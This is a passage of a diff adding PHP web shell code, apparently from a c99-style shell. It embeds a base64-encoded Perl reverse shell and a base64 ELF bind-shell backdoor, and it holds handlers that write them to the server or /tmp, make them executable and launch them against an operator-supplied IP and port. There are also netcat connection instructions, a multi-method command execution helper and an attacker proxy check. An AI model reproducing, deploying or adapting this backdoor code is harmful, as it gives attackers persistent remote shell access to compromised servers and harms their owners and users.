RpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+$hostname_x=php_uname(n);
+$itshome = getcwd();
+$itshome = str_replace("/home/","~",$itshome);
+$itshome = str_replace("/public_html","/x2300.php",$itshome);
+$enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0a beta"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
